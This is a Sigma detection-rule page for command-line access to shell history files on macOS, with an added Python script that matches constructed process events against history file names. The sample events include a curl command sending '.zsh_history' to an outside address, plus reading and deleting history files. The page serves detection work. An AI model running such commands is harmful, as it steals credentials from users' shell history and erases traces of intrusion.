
Suspicious History File Operations

Sigma Rules

Summary
This detection rule identifies suspicious command-line operations on shell history files on macOS hosts. Files such as '.bash_history' and '.zsh_history' record the commands a user has typed, which can include passwords, tokens and hostnames passed as arguments, so they are attractive to attackers who want to harvest credentials or to edit or delete the files to cover their tracks. The rule matches process events whose command line contains the names of common shell history files. A hit indicates possible misuse of administrative privileges or unauthorized access and warrants further investigation. Because the match is a keyword match on the command line, a process that opens a history file without naming it in its arguments (for example through a wildcard or a library call) will not trigger the rule. The rule includes filters to reduce false positives from legitimate administrative tasks and from users clearing their own history. It helps security teams recognize and respond to credential access attempts against macOS systems.
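The matching logic described above, reduced to a small Python script that is an added example and not the Sigma rule itself or any SIEM's engine: a case-insensitive "contains" check of the command line against history file names (Sigma's default string semantics), followed by a filter for known-benign parent processes. The sample events are constructed, the keyword list beyond the two names mentioned on this page is an assumption, and the benign-parent allow list is a hypothetical placeholder, not the rule's actual filters.

```python
"""Keyword match over process command lines for shell history file names.

Added illustration of the detection idea; not the Sigma rule or any vendor
code. Sample events are constructed and the filter values are placeholders.
"""
import json
from dataclasses import dataclass
from typing import List, Optional

# History file names: the two from the page plus other common ones (assumed;
# adjust to the shells present in your environment).
HISTORY_KEYWORDS = (
    ".bash_history",
    ".zsh_history",
    ".zhistory",
    ".sh_history",
    "fish_history",
)

# Hypothetical false-positive filter: parent processes (e.g. a backup agent)
# that legitimately read every file under a home directory. Placeholder value.
BENIGN_PARENT_IMAGES = (
    "/Library/Application Support/ExampleBackupAgent/agent",
)


@dataclass
class Match:
    user: str
    command_line: str
    keyword: str


def sigma_contains(haystack: str, needle: str) -> bool:
    """Sigma 'contains' semantics: substring match, case-insensitive.
    Case-insensitivity matters on macOS, whose default filesystem is
    case-insensitive, so '.ZSH_HISTORY' opens the same file."""
    return needle.lower() in haystack.lower()


def evaluate(event: dict) -> Optional[Match]:
    """Return a Match when the command line names a history file and no
    filter excludes the event; otherwise None."""
    cmdline = event.get("CommandLine", "")
    # selection: any history keyword in the command line
    hit = next((k for k in HISTORY_KEYWORDS if sigma_contains(cmdline, k)), None)
    if hit is None:
        return None
    # filter: known-benign parent process (hypothetical allow list)
    if event.get("ParentImage", "") in BENIGN_PARENT_IMAGES:
        return None
    return Match(event.get("User", "?"), cmdline, hit)


def scan(jsonl: str) -> List[Match]:
    """Run evaluate() over JSON-lines process events and collect hits."""
    matches = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        m = evaluate(json.loads(line))
        if m is not None:
            matches.append(m)
    return matches


# Constructed process-creation events (not real telemetry). 203.0.113.10 is a
# documentation address.
SAMPLE_EVENTS = """
{"User": "alice", "Image": "/bin/cat", "CommandLine": "cat /Users/alice/.bash_history", "ParentImage": "/bin/zsh"}
{"User": "alice", "Image": "/usr/bin/curl", "CommandLine": "curl -F file=@/Users/alice/.zsh_history http://203.0.113.10/up", "ParentImage": "/bin/zsh"}
{"User": "bob", "Image": "/bin/ls", "CommandLine": "ls -la /Users/bob", "ParentImage": "/bin/bash"}
{"User": "root", "Image": "/usr/bin/tar", "CommandLine": "tar czf /tmp/b.tgz /Users/alice/.bash_history", "ParentImage": "/Library/Application Support/ExampleBackupAgent/agent"}
{"User": "carol", "Image": "/bin/rm", "CommandLine": "rm -f /Users/carol/.ZSH_HISTORY", "ParentImage": "/bin/zsh"}
"""

if __name__ == "__main__":
    for m in scan(SAMPLE_EVENTS):
        print(f"{m.user}: '{m.keyword}' in: {m.command_line}")
```

Running the script flags the `cat`, `curl` and `rm` events and suppresses the backup agent's `tar`; the `ls` of the home directory never names a history file and so, as the caveat above notes, produces no hit even though it would reveal the file's presence.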
Categories
  • macOS
  • Endpoint
Data Sources
  • Process
ATT&CK Techniques
  • T1552.003
Created: 2020-10-17